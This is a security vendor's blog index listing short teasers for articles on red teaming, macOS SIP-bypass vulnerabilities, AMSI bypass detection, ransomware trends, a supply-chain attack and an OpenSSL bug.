What is Red Teaming & How it Benefits Orgs

What is Red Teaming & How it Benefits Orgs

In today’s increasingly connected world, red teaming has become a critical tool for organizations to test their security and identify possible gaps within their defenses. Red teaming, also known as red cell, adversary simulation, or Cyber Red Team, involves simulating real-world cyber attackers’ tactics, techniques, and procedures (TTPs) to assess an organization’s security posture. In the world of cybersecurity, the term “red teaming” refers to a method of ethical hacking that is goal-oriented and driven…

Read More

A Technical Analysis of CVE-2022-22583 and CVE-2022-32800

A Technical Analysis of CVE-2022-22583 and CVE-2022-32800

A Technical Analysis of CVE-2022-22583 and CVE-2022-32800 Exploits & Vulnerabilities This blog entry discusses the technical details of how we exploited CVE-2022-22583 using a different method. We also tackle the technical details of CVE-2022-32800, another SIP-bypass that we discovered more recently, in this report. By: Mickey Jin December 21, 2022 Read time:  ( words) On Jan. 26, 2022, Apple patched a System Integrity Protection (SIP)-bypass vulnerability in the PackageKit framework, identified as CVE-2022-22583. Apple shared…

Read More

Detecting Windows AMSI Bypass Techniques

Detecting Windows AMSI Bypass Techniques

Techniques bypassing AMSI were primarily used by security researchers and penetration testers. In recent years, however, cybercriminals have abused this and included the method as a feature in malware routines to evade detection that allowed them to continuously operate in a victim’s computer. Prior to AMSI, detections of fileless threats proved difficult. Previously documented methods used to achieve an AMSI bypass were: Obfuscation and/or encryption PowerShell downgrade Hooks and unhooks Memory patching Forcing an error…

Read More

Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities

Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities

A new bypass appears According to the aforementioned patch, we can see that if we can bypass the volume path check at line 81, then the system_installd service will spawn the script directly instead of resorting to the isolated XPC service. The question then is, how can we bypass the volume path check? Through debugging, we found that the destination volume path returned at line 80 is an arbitrary mounted DMG volume path that we…

Read More

Trend Helps Google Play Prevent Malicious Apps via ADA

Trend Helps Google Play Prevent Malicious Apps via ADA

Trend Helps Google Play Prevent Malicious Apps via ADA Trend Micro will be joining Google’s App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store. By: Jon Clay December 16, 2022 Read time:  ( words) Google has announced Trend Micro will be joining their App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the…

Read More

Ransomware Business Models: Future Pivots and Trends

Ransomware Business Models: Future Pivots and Trends

RDP port 3389 remains a popular service abused by ransomware actors to gain initial access to systems located and connected to on-premise infrastructure. However, as more organizations shift to the cloud services for file storage and active directory systems, ransomware groups will look for more opportunities to develop and/or exploit vulnerabilities not yet leveraged at scale. Evolutions Gradual evolutions in the current modern ransomware models as we know them are expected to be tweaked in…

Read More

Probing Weaponized Chat Applications Abused in Supply-Chain Attacks

Probing Weaponized Chat Applications Abused in Supply-Chain Attacks

In late September 2022, threat researchers uncovered a supply-chain attack carried out by malicious actors using a trojanized installer of Comm100, a chat-based customer engagement application. Our investigation of the incident revealed that the breadth and depth of the campaign’s impact were greater than what the researchers had initially thought; we also found that more applications and their respective versions had been affected and established that attacks began much earlier than their first reckoning on…

Read More

CVE-2019-8561 A Hard-to-Banish PackageKit Framework Vulnerability in macOS

CVE-2019-8561 A Hard-to-Banish PackageKit Framework Vulnerability in macOS

At line 28, if the offset value of the payload subpath inside the PKG file is not equal to zero, the “-[PKLeopardPackage payloadExtractorWithDestination:externalRoot:error:]” function will call the “-[PKPayloadCopier initWithArchivePath:offset:destination:]” function. Similar to the second method, there is a “triple fetch” issue. If the offset value is equal to zero, it will extract the payload from a special external root path, which seems to be unrestricted and can be controlled by an attacker. This means that…

Read More

Hack the Real Box: APT41’s New Subgroup Earth Longzhi

Hack the Real Box: APT41’s New Subgroup Earth Longzhi

Hack the Real Box: APT41’s New Subgroup Earth Longzhi APT & Targeted Attacks We looked into the campaigns deployed by a new subgroup of advanced persistent threat (APT) group APT41, Earth Longzhi. This entry breaks down the technical details of the campaigns in full as presented at HITCON PEACE 2022 in August. By: Hara Hiroaki, Ted Lee November 09, 2022 Read time:  ( words) In early 2022, we investigated an incident that compromised a company…

Read More

Latest on OpenSSL 3.0.7 Bug & Security-Fix

Latest on OpenSSL 3.0.7 Bug & Security-Fix

What to know and do about this week’s OpenSSL vulnerability A new vulnerability has just been disclosed in OpenSSL, an open-source cryptography library that is very widely used in a range of commercial and internal applications to provide encryption and other security and privacy capabilities. OpenSSL is found in applications deployed on-premises, in the cloud, in SaaS applications, on endpoints, servers, in IoT or OT environments, and more. What is the issue in OpenSSL? The…

Read More
1 2 3 4 9